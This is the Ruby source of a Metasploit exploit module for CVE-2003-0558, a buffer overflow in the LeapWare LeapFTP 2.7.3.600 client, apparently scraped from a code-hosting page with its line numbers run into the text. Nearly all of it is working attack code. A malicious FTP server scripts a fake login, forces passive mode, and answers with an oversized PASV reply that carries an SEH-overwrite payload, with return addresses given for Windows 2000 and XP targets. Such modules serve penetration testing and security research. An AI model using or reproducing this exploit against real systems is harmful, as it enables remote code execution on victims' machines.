Path: blob/master/modules/exploits/windows/ftp/leapftp_pasv_reply.rb
19664 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = NormalRanking78include Msf::Exploit::Remote::TcpServer9include Msf::Exploit::Remote::Seh1011def initialize(info = {})12super(13update_info(14info,15'Name' => 'LeapWare LeapFTP v2.7.3.600 PASV Reply Client Overflow',16'Description' => %q{17This module exploits a buffer overflow in the LeapWare LeapFTP v2.7.3.60018client that is triggered through an excessively long PASV reply command. This19module was ported from the original exploit by drG4njubas with minor improvements.20},21'Author' => [ 'aushack' ],22'License' => MSF_LICENSE,23'References' => [24[ 'CVE', '2003-0558' ],25[ 'OSVDB', '4587' ],26[ 'BID', '7860' ],27[ 'EDB', '54' ]28],29'DefaultOptions' => {30'EXITFUNC' => 'seh',31},32'Payload' => {33'Space' => 1000,34'BadChars' => "\x00\x0a\x0d\().,",35'StackAdjustment' => -3500,36},37'Platform' => 'win',38'Targets' => [39# Patrick - Tested against w2k sp0, sp4, xp sp0, xp sp2 en OK.40[ 'Universal LeapFTP.exe', { 'Ret' => 0x004bdd24 } ], # p/p/r LeapFTP.exe41[ 'Windows 2000 SP0/4 English', { 'Ret' => 0x75022ac4 } ], # p/p/r ws2help.dll42[ 'Windows XP SP0 English', { 'Ret' => 0x7660139c } ], # p/p/r cscdll.dll43],44'Privileged' => false,45'DisclosureDate' => '2003-06-09',46'DefaultTarget' => 0,47'Notes' => {48'Reliability' => UNKNOWN_RELIABILITY,49'Stability' => UNKNOWN_STABILITY,50'SideEffects' => UNKNOWN_SIDE_EFFECTS51}52)53)5455register_options(56[57OptPort.new('SRVPORT', [ true, "The FTP daemon port to listen on", 21 ]),58OptString.new('SRVNAME', [ true, "Welcome to the ... FTP Service", "Test" ]),59]60)61end6263def on_client_connect(client)64return if ((p = regenerate_payload(client)) == nil)6566buffer = "220 Welcome to the " + datastore['SRVNAME'] + " FTP Service.\r\n"67client.put(buffer)68end6970def on_client_data(client)71client.get_once7273# This could be improved if anyone wants to write a FTP server API.74user = "331 Please specify the password.\r\n"75client.put(user)7677client.get_once78pass = "230 Login successful.\r\n"79client.put(pass)8081client.get_once82syst = "215 Windows_NT 5.1\r\n"83client.put(syst)8485client.get_once86rest = "350 Restart position accepted (100).\r\n"87client.put(rest)8889client.get_once90rest = "350 Restart position accepted (0).\r\n"91client.put(rest)9293client.get_once94pwd = "257 \"/\"\r\n"95client.put(pwd)9697client.get_once98type = "200 Switching to ASCII mode.\r\n"99client.put(type)100101client.get_once102port = "500 Illegal PORT command.\r\n" # We force LeapFTP to use PASV. It will try PORT first.103client.put(port)104105client.get_once106pasv = "227 Entering Passive Mode ("107pasv << rand_text_numeric(1053) + generate_seh_payload(target.ret)108pasv << "," + rand_text_numeric(1)109pasv << "," + rand_text_numeric(1)110pasv << "," + rand_text_numeric(1)111pasv << "," + rand_text_numeric(1)112pasv << "," + rand_text_numeric(1)113pasv << ")\r\n"114115client.put(pasv)116117handler(client)118service.close_client(client)119end120end121122123